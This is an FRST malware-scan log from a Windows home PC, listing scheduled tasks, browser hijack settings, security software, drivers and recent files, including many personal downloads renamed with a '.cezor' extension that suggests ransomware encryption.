    Task: {1513EEE8-5F6F-4053-A936-F22E9785E602} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [156968 2019-03-05] (Google Inc -> Google Inc.)
    Task: {1CDADE97-157F-4041-AB72-EA9B115EA1F2} - System32\Tasks\AVGPCTuneUp_Task_BkGndMaintenance => C:\Program Files (x86)\AVG\AVG PC TuneUp\tuscanx.exe
    Task: {2E2C8219-5A6F-49A9-BA63-C875F291F6E4} - System32\Tasks\Java Platform SE Auto Updater => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [645456 2019-04-01] (Oracle America, Inc. -> Oracle Corporation)
    Task: {3B704672-6F66-4908-9CF2-DF44D6900E1C} - System32\Tasks\{7972A67A-3156-4A41-831E-C7B5A38C6522} => C:\Program Files (x86)\Epic Games\Launcher\Portal\Binaries\Win32\EpicGamesLauncher.exe
    Task: {4F1DE78F-0A8F-4CE3-938D-AC2B616AC190} - System32\Tasks\{7A857476-72D0-4F79-B46E-DDBB9367E33A} => E:\Games\League of Legends\LeagueClient.exe
    Task: {5E3E853A-A422-4F0A-8B19-A8AB5468C121} - System32\Tasks\Avast Software\Overseer => C:\Program Files\Common Files\Avast Software\Overseer\Overseer.exe [2281944 2019-06-04] (AVAST Software s.r.o. -> AVAST Software)
    Task: {8394AB45-EF1D-4E37-91A4-C8F05B75D6DF} - System32\Tasks\Microsoft\Office\Office 15 Subscription Heartbeat => C:\Program Files\Common Files\Microsoft Shared\Office15\OLicenseHeartbeat.exe [1642672 2012-10-01] (Microsoft Corporation -> Microsoft Corporation)
    Task: {A6C28662-3195-4229-AE9A-97B6C0522DFA} - System32\Tasks\{1B912E17-A9FD-4CD6-A680-038D79B5F007} => C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
    Task: {AE552268-BF38-464C-86FC-3F22D097691C} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [1195544 2018-12-16] (Adobe Systems, Incorporated -> Adobe Systems Incorporated)
    Task: {B313EECC-46DA-4262-A954-87BF9E4B7307} - System32\Tasks\{3A3C505F-FC03-4620-BBE7-38EBDA099095} => F:\Super Smash Flash 2 Beta\SSF2.exe
    Task: {B88369E2-7CB7-4586-BC03-2792BDFE3711} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [156968 2019-03-05] (Google Inc -> Google Inc.)
    Task: {BA036B6A-E3FB-446E-9C20-D5C649F72145} - System32\Tasks\{308D2D2D-ACA9-40A9-BC75-F3D6BEF07361} => C:\Users\ADMIN\Desktop\MCLeaksAuthenticator (3)\MCLeaksAuthenticator.exe
    Task: {BB26469E-2DB6-4ED7-ADC9-A9F97F2EA650} - System32\Tasks\{92049C58-6200-4261-9390-237D0B958AC5} => E:\Games\League of Legends\LeagueClient.exe
    Task: {D1214DFC-EFAE-4770-A2D1-3BBCA082E2B3} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentFallBack => C:\Program Files\Microsoft Office\Office15\msoia.exe [375416 2012-10-01] (Microsoft Corporation -> Microsoft Corporation)
    Task: {D6B8833C-EB4D-4272-A09A-886417B49657} - System32\Tasks\Opera scheduled Autoupdate 1551278621 => C:\Users\ADMIN\AppData\Local\Programs\Opera\launcher.exe
    Task: {EE2589EF-2101-4C28-B9C1-D1AD3D85A99F} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentLogOn => C:\Program Files\Microsoft Office\Office15\msoia.exe [375416 2012-10-01] (Microsoft Corporation -> Microsoft Corporation)

    (If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)

    Task: C:\Windows\Tasks\update-S-1-5-21-3161437104-263828448-1275724104-1000.job => C:\Program Files (x86)\Skillbrains\Updater\Updater.exe
    Task: C:\Windows\Tasks\update-sys.job => C:\Program Files (x86)\Skillbrains\Updater\Updater.exe

    ==================== Internet (Whitelisted) ====================

    (If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

    Hosts: There are more than one entry in Hosts. See Hosts section of Addition.txt
    Tcpip\Parameters: [DhcpNameServer] 192.168.100.1
    Tcpip\..\Interfaces\{644D5D4C-C575-4567-B554-70E1BFCA99F2}: [DhcpNameServer] 192.168.100.1

    Internet Explorer:
    ==================
    HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.bing.com/search?FORM=INCOH1&PC=IC05&PTAG=ICO-e40236c692d65b6f
    HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.bing.com/search?FORM=INCOH1&PC=IC05&PTAG=ICO-e40236c692d65b6f
    SearchScopes: HKLM -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxp://www.bing.com/search?FORM=INCOH2&PC=IC05&PTAG=ICO-e40236c692d65b6f&q={searchTerms}
    SearchScopes: HKLM -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxp://www.bing.com/search?FORM=INCOH2&PC=IC05&PTAG=ICO-e40236c692d65b6f&q={searchTerms}
    SearchScopes: HKLM-x32 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxp://www.bing.com/search?FORM=INCOH2&PC=IC05&PTAG=ICO-e40236c692d65b6f&q={searchTerms}
    SearchScopes: HKLM-x32 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxp://www.bing.com/search?FORM=INCOH2&PC=IC05&PTAG=ICO-e40236c692d65b6f&q={searchTerms}
    SearchScopes: HKU\S-1-5-21-3161437104-263828448-1275724104-1000 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxp://www.bing.com/search?FORM=INCOH2&PC=IC05&PTAG=ICO-e40236c692d65b6f&q={searchTerms}
    SearchScopes: HKU\S-1-5-21-3161437104-263828448-1275724104-1000 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxp://www.bing.com/search?FORM=INCOH2&PC=IC05&PTAG=ICO-e40236c692d65b6f&q={searchTerms}
    BHO: Lync Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files\Microsoft Office\Office15\OCHelper.dll [2013-07-10] (Microsoft Corporation -> Microsoft Corporation)
    BHO: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files\Microsoft Office\Office15\URLREDIR.DLL [2013-09-13] (Microsoft Corporation -> Microsoft Corporation)
    BHO: Microsoft SkyDrive Pro Browser Helper -> {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} -> C:\Program Files\Microsoft Office\Office15\GROOVEEX.DLL [2012-10-01] (Microsoft Corporation -> Microsoft Corporation)
    BHO-x32: Java(tm) Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre1.8.0_211\bin\ssv.dll [2019-07-06] (Oracle America, Inc. -> Oracle Corporation)
    BHO-x32: YoutubeAdBlock -> {7F5C0C11-7E68-4D65-868E-AE2BE9EEB44E} -> C:\Program Files (x86)\vONNFjhTKIE\kbNfsOv.dll => No File
    BHO-x32: Java(tm) Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre1.8.0_211\bin\jp2ssv.dll [2019-07-06] (Oracle America, Inc. -> Oracle Corporation)
    Handler: osf - {D924BDC6-C83A-4BD5-90D0-095128A113D1} - C:\Program Files\Microsoft Office\Office15\MSOSB.DLL [2012-10-01] (Microsoft Corporation -> Microsoft Corporation)
    Filter: deflate - {8f6b0360-b80d-11d0-a9b3-006097942311} - C:\Windows\system32\urlmon.dll [2009-07-14] (Microsoft Windows -> Microsoft Corporation)
    Filter-x32: deflate - {8f6b0360-b80d-11d0-a9b3-006097942311} - C:\Windows\SysWOW64\urlmon.dll [2009-07-14] (Microsoft Windows -> Microsoft Corporation)
    Filter: gzip - {8f6b0360-b80d-11d0-a9b3-006097942311} - C:\Windows\system32\urlmon.dll [2009-07-14] (Microsoft Windows -> Microsoft Corporation)
    Filter-x32: gzip - {8f6b0360-b80d-11d0-a9b3-006097942311} - C:\Windows\SysWOW64\urlmon.dll [2009-07-14] (Microsoft Windows -> Microsoft Corporation)
    StartMenuInternet: IEXPLORE.EXE - iexplore.exe

    FireFox:
    ========
    FF DefaultProfile: 5xrpb4mz.default
    FF ProfilePath: C:\Users\ADMIN\AppData\Roaming\Mozilla\Firefox\Profiles\5xrpb4mz.default [2019-07-10]
    FF Homepage: Mozilla\Firefox\Profiles\5xrpb4mz.default -> file:///C:/ProgramData/Quoteexs/ff.HP
    FF NewTab: Mozilla\Firefox\Profiles\5xrpb4mz.default -> file:///C:/ProgramData/Quoteexs/ff.NT
    FF Plugin: @microsoft.com/SharePoint,version=14.0 -> C:\PROGRA~1\MICROS~2\Office15\NPSPWRAP.DLL [2012-10-01] (Microsoft Corporation -> Microsoft Corporation)
    FF Plugin: @videolan.org/vlc,version=2.2.1 -> C:\Program Files\VideoLAN\VLC\npvlc.dll [2015-04-16] (VideoLAN) [File not signed]
    FF Plugin-x32: @java.com/DTPlugin,version=11.211.2 -> C:\Program Files (x86)\Java\jre1.8.0_211\bin\dtplugin\npDeployJava1.dll [2019-07-06] (Oracle America, Inc. -> Oracle Corporation)
    FF Plugin-x32: @java.com/JavaPlugin,version=11.211.2 -> C:\Program Files (x86)\Java\jre1.8.0_211\bin\plugin2\npjp2.dll [2019-07-06] (Oracle America, Inc. -> Oracle Corporation)
    FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.34.11\npGoogleUpdate3.dll [2019-05-15] (Google Inc -> Google LLC)
    FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.34.11\npGoogleUpdate3.dll [2019-05-15] (Google Inc -> Google LLC)
    FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AIR\nppdf32.dll [2018-06-29] (Adobe Systems, Incorporated -> Adobe Systems Inc.)
    FF Plugin ProgramFiles/Appdata: C:\Users\ADMIN\AppData\Roaming\mozilla\plugins\np-mswmp.dll [2015-11-07]

    Chrome:
    =======
    CHR Profile: C:\Users\ADMIN\AppData\Local\Google\Chrome\User Data\Default [2019-07-15]
    CHR Extension: (Adblocker for Youtube™) - C:\Users\ADMIN\AppData\Local\Google\Chrome\User Data\Default\Extensions\ffpfiaecfobeadhikddakkmaapliokib [2019-07-09] [UpdateUrl:hxxps://clients88.google.com/service/update2/crx] <==== ATTENTION
    CHR Extension: (Google Slides Offline) - C:\Users\ADMIN\AppData\Local\Google\Chrome\User Data\Default\Extensions\fidipdaiencjpnmkjcebeclkgalhcedi [2019-07-09] [UpdateUrl:hxxps://clients88.google.com/service/update2/crx] <==== ATTENTION
    CHR Extension: (Chrome Web Store Payments) - C:\Users\ADMIN\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2019-07-10]
    CHR Extension: (Chrome Media Router) - C:\Users\ADMIN\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2019-07-10]
    CHR Profile: C:\Users\ADMIN\AppData\Local\Google\Chrome\User Data\System Profile [2019-07-10]
    CHR Extension: (Adblocker for Youtube™) - C:\Users\ADMIN\AppData\Local\Google\Chrome\User Data\System Profile\Extensions\ffpfiaecfobeadhikddakkmaapliokib [2019-07-09] [UpdateUrl:hxxps://clients88.google.com/service/update2/crx] <==== ATTENTION
    CHR HKLM-x32\...\Chrome\Extension: [efaidnbmnnnibpcajpcglclefindmkaj] - hxxps://clients2.google.com/service/update2/crx

    ==================== Services (Whitelisted) ====================

    (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

    S3 BEService; C:\Program Files (x86)\Common Files\BattlEye\BEService.exe [1547200 2017-10-30] (Epic Games Inc. -> )
    S2 HWDeviceService64.exe; C:\ProgramData\DatacardService\HWDeviceService64.exe [339456 2010-11-16] () [File not signed]
    R2 LogiRegistryService; C:\Program Files\Logitech Gaming Software\Drivers\APOService\LogiRegistryService.exe [206472 2018-10-05] (Logitech Inc -> Logitech Inc.)
    R2 MBAMService; C:\Program Files\Malwarebytes\Anti-Malware\mbamservice.exe [6744288 2019-06-26] (Malwarebytes Corporation -> Malwarebytes)
    R2 TeamViewer; C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe [5702416 2015-09-11] (TeamViewer -> TeamViewer GmbH)
    S3 WinDefend; C:\Program Files\Windows Defender\mpsvc.dll [1011712 2009-07-14] (Microsoft Windows -> Microsoft Corporation)

    ===================== Drivers (Whitelisted) ======================

    (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

    R1 ESProtectionDriver; C:\Windows\system32\drivers\mbae64.sys [153328 2019-01-08] (Malwarebytes Corporation -> Malwarebytes)
    U5 ew_hwusbdev; C:\Windows\System32\Drivers\ew_hwusbdev.sys [117248 2018-04-01] (Microsoft Windows Hardware Compatibility Publisher -> Huawei Technologies Co., Ltd.)
    R3 huawei_enumerator; C:\Windows\System32\DRIVERS\ew_jubusenum.sys [86016 2018-04-01] (Microsoft Windows Hardware Compatibility Publisher -> Huawei Technologies Co., Ltd.)
    S3 hwdatacard; C:\Windows\System32\DRIVERS\ewusbmdm.sys [221312 2018-04-01] (Microsoft Windows Hardware Compatibility Publisher -> Huawei Technologies Co., Ltd.)
    R0 iaStorF; C:\Windows\System32\DRIVERS\iaStorF.sys [28008 2013-11-16] (Intel Corporation - Intel® Rapid Storage Technology -> Intel Corporation)
    S2 LGCoreTemp; C:\Program Files\Logitech Gaming Software\Drivers\LgCoreTemp\lgcoretemp.sys [14184 2015-06-22] (Logitech -> Logitech)
    R3 LGJoyXlCore; C:\Windows\System32\drivers\LGJoyXlCore.sys [67736 2018-10-05] (Logitech Inc -> Logitech Inc.)
    R2 MBAMChameleon; C:\Windows\System32\Drivers\MbamChameleon.sys [199768 2019-07-09] (Malwarebytes Corporation -> Malwarebytes)
    R3 MBAMFarflt; C:\Windows\System32\DRIVERS\farflt.sys [224408 2019-07-15] (Malwarebytes Corporation -> Malwarebytes)
    R3 MBAMProtection; C:\Windows\system32\DRIVERS\mbam.sys [73584 2019-07-15] (Malwarebytes Corporation -> Malwarebytes)
    R3 MBAMSwissArmy; C:\Windows\System32\Drivers\mbamswissarmy.sys [275232 2019-07-15] (Malwarebytes Corporation -> Malwarebytes)
    R3 MBAMWebProtection; C:\Windows\System32\DRIVERS\mwac.sys [106344 2019-07-15] (Malwarebytes Corporation -> Malwarebytes)
    R3 Serenum; C:\Windows\System32\DRIVERS\nuvserenum.sys [23552 2014-01-12] (Microsoft Windows Hardware Compatibility Publisher -> Windows (R) Win 7 DDK provider)
    R3 Serial; C:\Windows\System32\DRIVERS\nuvserial.sys [86016 2014-01-12] (Microsoft Windows Hardware Compatibility Publisher -> Nuvoton Technology Corp.)

    ==================== NetSvcs (Whitelisted) ===================

    (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)


    ==================== One month (created) ========

    (If an entry is included in the fixlist, the file/folder will be moved.)

    2019-07-15 16:37 - 2019-07-15 16:37 - 000275232 _____ (Malwarebytes) C:\Windows\system32\Drivers\mbamswissarmy.sys
    2019-07-15 16:37 - 2019-07-15 16:37 - 000224408 _____ (Malwarebytes) C:\Windows\system32\Drivers\farflt.sys
    2019-07-15 16:37 - 2019-07-15 16:37 - 000106344 _____ (Malwarebytes) C:\Windows\system32\Drivers\mwac.sys
    2019-07-15 16:37 - 2019-07-15 16:37 - 000073584 _____ (Malwarebytes) C:\Windows\system32\Drivers\mbam.sys
    2019-07-12 19:55 - 2019-07-15 16:35 - 000000000 ___DC C:\AdwCleaner
    2019-07-12 19:51 - 2019-07-15 16:39 - 000000000 ____D C:\Users\ADMIN\Desktop\FRST-OlderVersion
    2019-07-12 19:49 - 2019-07-12 19:49 - 007025360 _____ (Malwarebytes) C:\Users\ADMIN\Desktop\AdwCleaner.exe
    2019-07-10 21:26 - 2019-07-10 21:26 - 000000008 __RSH C:\ProgramData\ntuser.pol
    2019-07-10 21:20 - 2019-07-12 19:51 - 000001169 _____ C:\Users\ADMIN\Desktop\Fixlog.txt
    2019-07-10 17:34 - 2019-07-10 17:37 - 000051586 _____ C:\Users\ADMIN\Desktop\Addition.txt
    2019-07-10 17:30 - 2019-07-15 16:40 - 000020601 _____ C:\Users\ADMIN\Desktop\FRST.txt
    2019-07-10 17:30 - 2019-07-15 16:39 - 000000000 ___DC C:\FRST
    2019-07-10 17:29 - 2019-07-15 16:39 - 002095104 ____C (Farbar) C:\Users\ADMIN\Desktop\help.exe
    2019-07-09 16:56 - 2019-07-09 16:56 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Lightshot
    2019-07-09 16:56 - 2019-07-09 16:56 - 000000000 ____D C:\Program Files (x86)\Skillbrains
    2019-07-09 16:55 - 2019-07-09 16:55 - 002731128 _____ (Skillbrains ) C:\Users\ADMIN\Downloads\setup-lightshot.exe
    2019-07-09 15:12 - 2019-07-09 15:12 - 000000000 ____D C:\Users\ADMIN\AppData\Local\mbam
    2019-07-09 15:10 - 2019-07-09 15:10 - 000199768 _____ (Malwarebytes) C:\Windows\system32\Drivers\MbamChameleon.sys
    2019-07-09 15:10 - 2019-07-09 15:10 - 000000000 ____D C:\Users\ADMIN\AppData\Local\mbamtray
    2019-07-09 15:09 - 2019-07-09 15:09 - 000001827 _____ C:\Users\Public\Desktop\Malwarebytes.lnk
    2019-07-09 15:09 - 2019-07-09 15:09 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes
    2019-07-09 15:09 - 2019-07-09 15:09 - 000000000 ____D C:\ProgramData\Malwarebytes
    2019-07-09 15:09 - 2019-07-09 15:09 - 000000000 ____D C:\Program Files\Malwarebytes
    2019-07-09 15:09 - 2019-01-08 16:32 - 000153328 _____ (Malwarebytes) C:\Windows\system32\Drivers\mbae64.sys
    2019-07-09 15:07 - 2019-07-09 15:36 - 064446574 _____ C:\Users\ADMIN\Downloads\mb3-setup-consumer-3.8.3.2965-1.0.613-1.0.11450.exe.cezor
    2019-06-24 16:29 - 2019-06-24 16:29 - 000171376 _____ C:\Windows\ntbtlog.txt
    2019-06-21 17:53 - 2019-06-21 17:54 - 000000000 ____D C:\Users\ADMIN\Desktop\versues
    2019-06-21 17:48 - 2019-06-21 17:48 - 000000000 ____D C:\Users\ADMIN\Documents\Pvp TP
    2019-06-21 17:47 - 2019-07-09 15:36 - 000360487 _____ C:\Users\ADMIN\Documents\Pvp TP.zip.cezor

    ==================== One month (modified) ========

    (If an entry is included in the fixlist, the file/folder will be moved.)

    2019-07-15 16:38 - 2015-11-07 13:49 - 000000000 ____D C:\Users\ADMIN\AppData\Roaming\vlc
    2019-07-15 16:36 - 2018-06-25 19:44 - 000065536 _____ C:\Windows\system32\Ikeext.etl
    2019-07-15 16:36 - 2009-07-14 10:38 - 000000006 ____H C:\Windows\Tasks\SA.DAT
    2019-07-15 16:35 - 2019-03-31 00:14 - 000001832 _____ C:\Users\ADMIN\Desktop\Internet Explorer.lnk
    2019-07-15 16:35 - 2018-02-28 21:09 - 000002130 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
    2019-07-15 16:35 - 2016-12-04 09:34 - 000002161 _____ C:\Users\children\Desktop\Google Chrome.lnk
    2019-07-15 16:35 - 2016-10-22 14:23 - 000001355 _____ C:\Users\children\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk
    2019-07-15 16:35 - 2015-11-07 13:42 - 000001355 _____ C:\Users\ADMIN\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk
    2019-07-15 16:12 - 2009-07-14 10:43 - 000713888 _____ C:\Windows\system32\PerfStringBackup.INI
    2019-07-15 16:12 - 2009-07-14 08:50 - 000000000 ____D C:\Windows\inf
    2019-07-15 16:10 - 2009-07-14 10:15 - 000016944 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
    2019-07-15 16:10 - 2009-07-14 10:15 - 000016944 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
    2019-07-15 16:08 - 2018-08-13 19:10 - 000004294 _____ C:\Windows\System32\Tasks\User_Feed_Synchronization-{908EB34C-ED29-443A-A938-EB5B6D9C0525}
    2019-07-14 19:45 - 2009-07-14 08:50 - 000000000 ____D C:\Windows\tracing
    2019-07-14 13:45 - 2015-11-07 09:12 - 000000388 _____ C:\Windows\Tasks\update-S-1-5-21-3161437104-263828448-1275724104-1000.job
    2019-07-13 21:14 - 2015-11-07 09:12 - 000000388 _____ C:\Windows\Tasks\update-sys.job
    2019-07-13 18:21 - 2017-01-04 18:49 - 000000000 ____D C:\Users\ADMIN\AppData\Roaming\.minecraft
    2019-07-10 21:32 - 2015-11-07 14:35 - 000000000 ____D C:\Users\ADMIN\AppData\Local\Rockstar Games
    2019-07-10 21:32 - 2015-11-07 14:31 - 000000000 ___HD C:\Program Files (x86)\InstallShield Installation Information
    2019-07-10 21:32 - 2015-11-07 14:31 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Rockstar Games
    2019-07-10 21:26 - 2016-10-22 07:16 - 000000008 __RSH C:\Users\ADMIN\ntuser.pol
    2019-07-10 21:26 - 2015-11-07 13:41 - 000000000 ____D C:\Users\ADMIN
    2019-07-10 21:22 - 2015-12-10 18:16 - 000000000 ___SD C:\Users\ADMIN\AppData\LocalLow\Temp
    2019-07-10 21:21 - 2015-11-07 13:49 - 000000000 ____D C:\Program Files\NVIDIA Corporation
    2019-07-10 21:20 - 2009-07-14 08:50 - 000000000 ___HD C:\Windows\system32\GroupPolicy
    2019-07-10 21:17 - 2018-10-28 17:31 - 000000000 ____D C:\Windows\System32\Tasks\{41FAE7E5-395A-1362-6827-28D01E0CDFE5}
    2019-07-10 21:11 - 2015-11-07 13:59 - 000000000 ____D C:\Users\ADMIN\AppData\Roaming\uTorrent
    2019-07-10 17:13 - 2018-10-29 14:31 - 000000413 _____ C:\Users\ADMIN\AppData\Roaming\WB.CFG
    2019-07-09 15:37 - 2019-02-18 13:47 - 000000000 ____D C:\Users\ADMIN\Desktop\RedBoy 3.2.1
    2019-07-09 15:37 - 2019-02-08 21:07 - 000016837 _____ C:\Users\ADMIN\Downloads\unknown.png.cezor
    2019-07-09 15:37 - 2019-02-03 21:54 - 006177443 _____ C:\Users\ADMIN\Downloads\[STATION 3] NCT DREAM 엔시티 드림 사랑한단 뜻이야 (Candle Light) MV.mp3.cezor
    2019-07-09 15:37 - 2019-02-03 21:54 - 000239157 _____ C:\Users\ADMIN\Downloads\Then You Think Again.pdf.cezor
    2019-07-09 15:37 - 2019-02-03 21:54 - 000130035 _____ C:\Users\ADMIN\Downloads\Then You Think Again.txt.cezor
    2019-07-09 15:37 - 2019-02-03 21:51 - 006915350 _____ C:\Users\ADMIN\Downloads\WayV 威神V 梦想发射计划 (Dream Launch) MV.mp3.cezor
    2019-07-09 15:37 - 2019-01-25 22:33 - 000145074 _____ C:\Users\ADMIN\Downloads\The Bedwarmer and the Reluctant.pdf.cezor
    2019-07-09 15:37 - 2019-01-24 21:32 - 000074308 _____ C:\Users\ADMIN\Downloads\Strangers on a Plane.pdf.cezor
    2019-07-09 15:37 - 2019-01-24 21:32 - 000030577 _____ C:\Users\ADMIN\Downloads\Strangers on a Plane.txt.cezor
    2019-07-09 15:37 - 2019-01-22 23:20 - 000101057 _____ C:\Users\ADMIN\Downloads\Spartacus and the Open Taxi.pdf.cezor
    2019-07-09 15:37 - 2019-01-22 23:20 - 000052326 _____ C:\Users\ADMIN\Downloads\Spartacus and the Open Taxi.txt.cezor
    2019-07-09 15:37 - 2019-01-22 23:17 - 000035702 _____ C:\Users\ADMIN\Downloads\ssj.txt.cezor
    2019-07-09 15:37 - 2019-01-22 23:16 - 000079221 _____ C:\Users\ADMIN\Downloads\ssj.pdf.cezor
    2019-07-09 15:37 - 2019-01-21 21:36 - 008179663 _____ C:\Users\ADMIN\Downloads\WAYV - 'COME BACK' LYRICS COLOR CODED [CHNROMENG].mp4.cezor
    2019-07-09 15:37 - 2019-01-21 21:35 - 005058984 _____ C:\Users\ADMIN\Downloads\WAYV - 'COME BACK' LYRICS COLOR CODED [CHNROMENG].mp3.cezor
    2019-07-09 15:37 - 2019-01-20 20:50 - 000663264 _____ C:\Users\ADMIN\Downloads\The Crown of the Summer Court.pdf.cezor
    2019-07-09 15:37 - 2019-01-20 20:50 - 000138345 _____ C:\Users\ADMIN\Downloads\The Crown of the Summer Court.txt.cezor
    2019-07-09 15:37 - 2019-01-19 14:33 - 001172537 _____ C:\Users\ADMIN\Downloads\The Student Prince.pdf.cezor
    2019-07-09 15:37 - 2019-01-19 14:33 - 000830709 _____ C:\Users\ADMIN\Downloads\The Student Prince.txt.cezor
    2019-07-09 15:37 - 2019-01-19 14:26 - 000269725 _____ C:\Users\ADMIN\Downloads\Youd fit my lonely arms so.pdf.cezor
    2019-07-09 15:37 - 2019-01-19 14:26 - 000148504 _____ C:\Users\ADMIN\Downloads\Youd fit my lonely arms so.txt.cezor
    2019-07-09 15:37 - 2019-01-18 15:59 - 000096810 _____ C:\Users\ADMIN\Downloads\The Emperor and the Star.txt.cezor
    2019-07-09 15:37 - 2019-01-18 15:55 - 000163852 _____ C:\Users\ADMIN\Downloads\The Emperor and the Star.pdf.cezor
    2019-07-09 15:37 - 2019-01-17 21:30 - 000670481 _____ C:\Users\ADMIN\Downloads\The Love of a Good Wizard.pdf.cezor
    2019-07-09 15:37 - 2019-01-17 21:30 - 000431762 _____ C:\Users\ADMIN\Downloads\The Love of a Good Wizard.txt.cezor
    2019-07-09 15:37 - 2019-01-16 13:28 - 000243921 _____ C:\Users\ADMIN\Downloads\to be first to be best.pdf.cezor
    2019-07-09 15:37 - 2019-01-16 13:28 - 000152568 _____ C:\Users\ADMIN\Downloads\to be first to be best.txt.cezor
    2019-07-09 15:37 - 2019-01-14 21:01 - 000124489 _____ C:\Users\ADMIN\Downloads\take my heart.pdf.cezor
    2019-07-09 15:37 - 2019-01-14 21:01 - 000061050 _____ C:\Users\ADMIN\Downloads\take my heart.txt.cezor
    2019-07-09 15:37 - 2019-01-13 22:36 - 004838928 _____ C:\Users\ADMIN\Downloads\[Stray Kids SKZ-PLAYER] Bang Chan X Changbin X HAN.mp3.cezor
    2019-07-09 15:37 - 2019-01-11 21:51 - 006033246 _____ C:\Users\ADMIN\Downloads\Stray Kids Hellevator MV.mp3.cezor
    2019-07-09 15:37 - 2019-01-11 21:51 - 004931715 _____ C:\Users\ADMIN\Downloads\Stray Kids Voices Performance Video.mp3.cezor
    2019-07-09 15:37 - 2019-01-11 21:50 - 000230356 _____ C:\Users\ADMIN\Downloads\stranger danger.pdf.cezor
    2019-07-09 15:37 - 2019-01-11 21:50 - 000086715 _____ C:\Users\ADMIN\Downloads\stranger danger.txt.cezor
    2019-07-09 15:37 - 2019-01-10 21:37 - 005914128 _____ C:\Users\ADMIN\Downloads\[MV] THE BOYZ(더보이즈) No Air.mp3.cezor
    2019-07-09 15:37 - 2019-01-10 21:37 - 005447686 _____ C:\Users\ADMIN\Downloads\Stray Kids My Pace MV.mp3.cezor
    2019-07-09 15:37 - 2019-01-06 21:36 - 000000000 ____D C:\Users\ADMIN\Desktop\TheFastestMouseClicker
    2019-07-09 15:37 - 2019-01-03 22:01 - 000044829 _____ C:\Users\ADMIN\Downloads\Time After Time.txt.cezor
    2019-07-09 15:37 - 2019-01-03 22:00 - 000107992 _____ C:\Users\ADMIN\Downloads\Time After Time.pdf.cezor
    2019-07-09 15:37 - 2019-01-02 21:38 - 000141551 _____ C:\Users\ADMIN\Downloads\what light through yonder.pdf.cezor
    2019-07-09 15:37 - 2019-01-02 21:38 - 000083045 _____ C:\Users\ADMIN\Downloads\what light through yonder.txt.cezor
    2019-07-09 15:37 - 2018-12-30 22:46 - 003818899 _____ C:\Users\ADMIN\Downloads\XO- The Eden Project (Lyrics).mp3.cezor
    2019-07-09 15:37 - 2018-12-30 22:46 - 000640667 _____ C:\Users\ADMIN\Downloads\were on a highway to hell.txt.cezor
    2019-07-09 15:37 - 2018-12-30 22:45 - 001114723 _____ C:\Users\ADMIN\Downloads\were on a highway to hell.pdf.cezor
    2019-07-09 15:37 - 2018-12-30 16:12 - 000000000 ____D C:\Users\ADMIN\Documents\Bandicam
    2019-07-09 15:37 - 2018-12-26 21:32 - 000040034 _____ C:\Users\ADMIN\Downloads\Where Is Peter Parker.txt.cezor
    2019-07-09 15:37 - 2018-12-26 21:31 - 000095254 _____ C:\Users\ADMIN\Downloads\Where Is Peter Parker.pdf.cezor
    2019-07-09 15:37 - 2018-12-15 23:07 - 000299682 _____ C:\Users\ADMIN\Downloads\this city bleeds its aching.pdf.cezor
    2019-07-09 15:37 - 2018-12-15 23:07 - 000193815 _____ C:\Users\ADMIN\Downloads\this city bleeds its aching.txt.cezor
    2019-07-09 15:37 - 2018-12-13 21:19 - 000083244 _____ C:\Users\ADMIN\Downloads\Those walls I built didnt.txt.cezor
    2019-07-09 15:37 - 2018-12-13 21:19 - 000029850 _____ C:\Users\ADMIN\Downloads\Wisdom Teeth Woes.txt.cezor
    2019-07-09 15:37 - 2018-12-13 21:17 - 000166178 _____ C:\Users\ADMIN\Downloads\Those walls I built didnt.pdf.cezor
